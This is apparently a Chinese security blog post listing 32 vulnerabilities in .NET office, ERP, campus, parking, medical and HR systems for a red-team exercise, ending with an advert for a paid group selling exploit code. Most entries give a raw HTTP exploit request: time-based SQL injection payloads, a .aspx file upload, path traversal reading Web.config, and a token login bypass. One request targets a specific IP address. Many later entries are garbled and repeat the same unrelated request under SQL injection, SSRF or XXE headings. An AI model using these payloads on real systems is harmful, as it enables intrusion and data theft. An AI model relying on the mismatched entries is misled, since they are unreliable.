正文

2024hvv | 32套.NET系统漏洞威胁情报(08.26更新)

admin
admin V管理员 /0 评论 /91 阅读
0826
此篇文章发布距今已超过89天,您需要注意文章的内容或图片是否可用!

32

某OA协同管理系统SQL注入

32.1 漏洞概述

**系统接口 /C6/****.Web.Work***/DBModules.aspx 接口存在SQL注入漏洞

GET /C6/***.Web.Work***/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: 123.57.26.236
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

31

某终端操作系统泄露敏感数据

31.1 漏洞概述

**系统接口 /report/Park***/GetData** 接口存在敏感数据泄露漏洞

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000

30

某智慧校园系统文件上传漏洞

30.1 漏洞概述

**系统接口 /Module/File***/FileUp**.aspx 存在文件上传漏洞

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--

29

某智慧校园系统文件读取漏洞

29.1 漏洞概述

**系统接口 /Module/File***/Down**.aspx 存在SQL注入漏洞

POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config

28

某ERP系统SQL注入漏洞-2

28.1 漏洞概述

**系统接口 /ashx/Default****.ashx 存在SQL注入漏洞

POST /ashx/Default***.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Content-Length: 115
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=GetDetail&status=300&id=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--

27

某OA系统存在SQL注入

27.1 漏洞概述

**系统接口 /WebService/Basic***.asmx 存在注入漏洞

POST /WebService/Basic***.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
SOAPAction: "http://tempuri.org/GetStreamID"
Content-Length: 85

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStreamID xmlns="http://tempuri.org/">
<tableName>';waitfor delay '0:0:6'--+</tableName>
<webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
</GetStreamID>
</soap:Body>
</soap:Envelope>

26

某企业管理系统登录后台漏洞

26.1 漏洞概述

**系统接口 /Auth***/Index 存在任意账户登录漏洞

GET /Auth***/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1

25

某ERP系统SQL注入漏洞

25.1 漏洞概述

**系统接口 /PDCA/ashx/CommentSta****.ashx 存在SQL注入漏洞

POST /PDCA/ashx/CommentSta***.ashx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36

action=detailInfo&fileid=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--

24

某票务管理系统SQL注入漏洞

24.1 漏洞概述

**系统接口 /System***/Comm/SeatMap***.ashx 存在SQL注入漏洞

POST /System***/Comm/SeatMap***.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

Method=GetZoneInfo&solutionNo=1'%3bDECLARE+%40x+CHAR(9)%3bSET+%40x%3d0x
303a303a35%3bWAITFOR+DELAY+%40x--

23

某一卡通系统SQL注入漏洞

23.1 漏洞概述

**系统接口 /Data***.asmx 存在SQL注入漏洞

POST /Data***.asmx HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ExeAppCmd"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ExeAppCmd xmlns="http://tempuri.org/">
      <str>{"cmd":"get_sb_guanli","Type":"1');WAITFOR DELAY '0:0:4'--"}</str>
      <files>MTIz</files>
    </ExeAppCmd>
  </soap:Body>
</soap:Envelope>

22

某BPM系统SQL注入漏洞

22.1 漏洞概述

**系统接口 /WF/Comm/Han***.ashx 存在SQL注入漏洞

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
0

21

某智慧协同系统SQL注入漏洞

21.1 漏洞概述

**系统接口 /third/DingTalk/Pages/***.aspx 存在SQL注入漏洞

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
1

20

某企业管理系统文件读取漏洞

20.1 漏洞概述

**系统接口 /Utility/GetCss**

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
2

19

某智能停车系统SQL注入漏洞

19.1 漏洞概述

**系统接口 /KT_Admin/CarCard/DoubtCarNo***.as** 存在SQL注入漏洞。

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
3

18

某EIS平台SQL注入漏洞-2

18.1 漏洞概述

**EIS系统接口 /frm/frm_form_***.aspx存在SQL注入漏洞。

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
4

17

某EIS平台SQL注入漏洞

17.1 漏洞概述

**EIS系统接口 /third/DingTalk/Demo/Show**.aspx 存在SQL注入漏洞。

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
5

16

某达OA系统任意用户登录

16.1 漏洞概述

**达OA系统接口 /Lk6SyncService/DirectToOthers/GetSSO***.asmx 存在任意用户登录漏洞。

16.2 漏洞详情

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
6

15

某达OA系统SQL注入漏洞

15.1 漏洞概述

**达OA系统接口 /Webservice/IM/Config/Config***.asmx 存在SQL注入漏洞。

15.2 漏洞详情

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
7

14

某达学分系统SQL注入漏洞

14.1 漏洞概述

***计算机系统开发有限公司,成立于1996年,是一家以从事软件和信息技术服务业为主的企业。分系统某接口存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。

14.2 漏洞详情

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
8

13

某云智慧系统SQL注入漏洞

13.1 漏洞详情

POST /report/Park**/GetData** HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

page=1&rows=20000
9

12

某通系统SSRF漏洞

12.1 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
0

11

某达OA系统XXE漏洞

11.1 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
1

10

某智ERP系统文件读取漏洞

10.1 漏洞概述

**ERP是一款旨在通过信息化手段帮助企业优化业务流程,提升管理效率,增强综合竞争力。适用于各类企业,包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求,汇智ERP提供了不同的版本,以满足企业的个性化需求。

10.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
2

09

某和OA系统SQL注入漏洞

9.1 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
3

08

某慧综合管理系统SQL注入漏洞

8.1 漏洞概述

由于***综合管理信息系统 Login***.aspx没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

8.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
4

07

某邦项目管理系统上传漏洞

7.1 漏洞概述

某项目管理系统/***/***In.aspx存在任意文件上传漏洞,导致获取服务器权限,造成系统严重危害。

7.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
5

06

某问物业系统文件读取漏洞

6.1 漏洞概述

物业ERP系统/***DownLoad.aspx和**DownLoad.aspx接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用

6.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
6
POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
7

05

某文工程系统SQL注入漏洞

5.1 漏洞概述

**工程管理系统 ***Business***.as**接口处存在SQL注入漏洞。未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。

5.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
8

04

某讯一卡通系统SQL注入漏洞

4.1 漏洞概述

**一卡通管理系统get_kq_tj_**存在SQL注入漏洞,未经身份验证的远程攻击者可以利用SQL注入漏洞获取数据库中的信息。

4.2 漏洞详情

POST /Moudule/File**/FileUp***.aspx HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
Connection: close
 
------21909179191068471382830692394
Content-Disposition: form-data; name="File"; filename="23.aspx"
Content-Type: image/jpeg
 
123
------21909179191068471382830692394--
9

03

某脉医疗系统文件下载漏洞

3.1 漏洞概述

**医疗管理系统DownLoad**存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

3.2 漏洞详情

POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config
0

02

某蓝企业系统文件读取漏洞

**企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

2.1 漏洞概述

**企业管理系统 ***TxtLog和 ***File接口接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

2.2 漏洞详情

POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config
1
POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config
2

01

某享人力管理系统任意文件读取漏洞

*****软件专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。

1.1 漏洞概述

该人力系统DownLoad**** 接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。

1.2 漏洞详情

POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config
3

漏洞详情已经打包在星球,感兴趣的朋友可以加入自取。更多的.NET漏洞情报,请加入星球后获取,星球持续更新最新的 .NET 应用漏洞POC,并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞,确保您始终掌握最前沿的安全信息和防护措施。

推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!







欢迎加入.NET安全星球

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。

目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集

POST Module/File***/Down**.aspx HTTP/1.1
Host: x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36

filePath=~/Scripts/pad/../../Web.config&fileName=Web.config
4

这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒zhousa.om